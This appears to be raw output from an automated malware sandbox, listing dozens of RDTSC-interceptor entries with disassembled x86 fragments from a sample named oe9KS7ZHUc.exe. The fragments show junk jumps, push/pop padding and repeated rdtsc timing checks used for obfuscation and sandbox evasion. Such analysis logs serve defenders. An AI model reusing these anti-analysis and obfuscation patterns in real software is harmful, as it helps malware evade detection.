              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5350485 second address: 5350506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD845024961h 0x00000009 adc cl, FFFFFFD6h 0x0000000c jmp 00007FD845024961h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD845024960h 0x00000018 xor si, B9F8h 0x0000001d jmp 00007FD84502495Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FD845024966h 0x0000002c mov ebp, esp 0x0000002e jmp 00007FD845024960h 0x00000033 mov edx, dword ptr [ebp+0Ch] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5350506 second address: 535050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 535050A second address: 535050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 535050E second address: 5350514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53705E7 second address: 53706B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD84502495Bh 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD845024966h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 call 00007FD84502495Eh 0x0000001e jmp 00007FD845024962h 0x00000023 pop ecx 0x00000024 jmp 00007FD84502495Bh 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b jmp 00007FD845024966h 0x00000030 push eax 0x00000031 pushad 0x00000032 jmp 00007FD845024961h 0x00000037 pushfd 0x00000038 jmp 00007FD845024960h 0x0000003d and eax, 5EB54478h 0x00000043 jmp 00007FD84502495Bh 0x00000048 popfd 0x00000049 popad 0x0000004a xchg eax, ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FD845024965h 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53706B7 second address: 53706F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FD84520DEEEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, A0h 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov eax, 516D6167h 0x0000001d call 00007FD84520DEECh 0x00000022 pop eax 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53706F7 second address: 53706FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53706FD second address: 5370701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370701 second address: 5370705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370705 second address: 5370740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007FD84520DEF6h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD84520DEF7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370740 second address: 5370746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370746 second address: 537074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 537074A second address: 5370785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84502495Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD845024969h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD84502495Dh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370785 second address: 537078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 537078A second address: 53707AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD845024965h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53707CC second address: 53707D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53707D2 second address: 5370805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD84502495Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-04h], 00000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD845024967h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370805 second address: 5370844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD84520DEF8h 0x00000015 adc si, 3698h 0x0000001a jmp 00007FD84520DEEBh 0x0000001f popfd 0x00000020 mov ecx, 36A3244Fh 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370844 second address: 5370858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD845024960h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370858 second address: 537085C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 537085C second address: 5370870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD8450249C2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370870 second address: 5370874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370874 second address: 537088C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024964h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 537088C second address: 537089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD84520DEEEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53708BA second address: 53708BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53708BE second address: 53708C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53708C4 second address: 53708CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53708CA second address: 53708CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53708CE second address: 5370906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007FD845024960h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edx, ax 0x00000016 jmp 00007FD845024966h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370906 second address: 5370918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD84520DEEEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370918 second address: 53601B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD84502495Dh 0x00000010 or ax, 8316h 0x00000015 jmp 00007FD845024961h 0x0000001a popfd 0x0000001b mov esi, 1D60F187h 0x00000020 popad 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 xor ebx, ebx 0x0000002a cmp eax, 00000000h 0x0000002d je 00007FD845024ABAh 0x00000033 mov dword ptr [esp], 0000000Dh 0x0000003a call 00007FD849A80C9Eh 0x0000003f mov edi, edi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 mov edi, 24A46FB4h 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53601B7 second address: 5360237 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD84520DEEDh 0x00000008 sub ecx, 01D33376h 0x0000000e jmp 00007FD84520DEF1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx ecx, bx 0x00000019 popad 0x0000001a push esi 0x0000001b pushad 0x0000001c mov di, ax 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 jmp 00007FD84520DEECh 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ax, di 0x00000032 pushfd 0x00000033 jmp 00007FD84520DEF9h 0x00000038 sub ecx, 1368A8E6h 0x0000003e jmp 00007FD84520DEF1h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360237 second address: 536025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007FD84502495Ah 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536025D second address: 5360292 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD84520DEEBh 0x00000008 and eax, 152350CEh 0x0000000e jmp 00007FD84520DEF9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 mov di, cx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360292 second address: 53602D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 mov ecx, 2E8727EBh 0x0000000e mov ebx, ecx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FD845024963h 0x00000018 push eax 0x00000019 push edx 0x0000001a call 00007FD845024966h 0x0000001f pop eax 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53602D1 second address: 53602F3 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FD84520DEEAh 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD84520DEEAh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53602F3 second address: 53602F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53602F9 second address: 536032C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD84520DEEBh 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD84520DEF0h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536032C second address: 5360332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53603C9 second address: 53603FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007FD84520E156h 0x00000010 jmp 00007FD84520DEF0h 0x00000015 lea ecx, dword ptr [ebp-14h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53603FF second address: 5360403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360403 second address: 5360420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360484 second address: 536048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536048A second address: 536048E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536048E second address: 53604CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f pushfd 0x00000010 jmp 00007FD84502495Fh 0x00000015 or cx, 7A1Eh 0x0000001a jmp 00007FD845024969h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53604CD second address: 53604DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD84520DEECh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360564 second address: 5360568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360568 second address: 536056C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536056C second address: 5360572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360572 second address: 536059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FD8B5ACBDE8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD84520DEEAh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536059E second address: 53605A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53606BC second address: 5360707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 pushad 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov dh, al 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FD84520DEF0h 0x00000017 or si, EBC8h 0x0000001c jmp 00007FD84520DEEBh 0x00000021 popfd 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD84520DEF1h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360707 second address: 536070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536070D second address: 5360717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 3FE01D79h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360717 second address: 536075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD845024967h 0x00000011 sbb esi, 2B31501Eh 0x00000017 jmp 00007FD845024969h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536075E second address: 536077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD84520DEECh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536077E second address: 5360790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD84502495Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360790 second address: 5360794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536081C second address: 5360820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360820 second address: 536082E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536082E second address: 5360840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD84502495Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360840 second address: 5360859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 movzx esi, dx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360859 second address: 5360880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD84502495Ah 0x0000000a add al, FFFFFF88h 0x0000000d jmp 00007FD84502495Bh 0x00000012 popfd 0x00000013 popad 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360880 second address: 5360886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360886 second address: 53608A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD845024969h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53608A3 second address: 53608A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53608A7 second address: 536001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD8B58E26FCh 0x0000000e xor eax, eax 0x00000010 jmp 00007FD844FFE08Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007FD845024A95h 0x0000002d call 00007FD849A8099Ch 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD845024969h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536001F second address: 5360023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360023 second address: 5360029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360029 second address: 536008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, CAA9h 0x00000007 movzx ecx, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FD84520DEEEh 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FD84520DEF0h 0x0000001b mov ebp, esp 0x0000001d jmp 00007FD84520DEF0h 0x00000022 xchg eax, ecx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007FD84520DEECh 0x0000002c or cl, 00000008h 0x0000002f jmp 00007FD84520DEEBh 0x00000034 popfd 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536008A second address: 53600AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 movsx edx, si 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD845024963h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53600AC second address: 53600B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 53600B1 second address: 5360105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD845024965h 0x0000000a sub ax, E486h 0x0000000f jmp 00007FD845024961h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ecx 0x00000019 jmp 00007FD84502495Eh 0x0000001e mov dword ptr [ebp-04h], 55534552h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov esi, edx 0x0000002a mov bx, EB6Ch 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536012A second address: 536013F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536013F second address: 536018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD845024963h 0x00000013 sub ecx, 563A33DEh 0x00000019 jmp 00007FD845024969h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 536018D second address: 53601A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD84520DEF3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360D71 second address: 5360D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360D75 second address: 5360D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
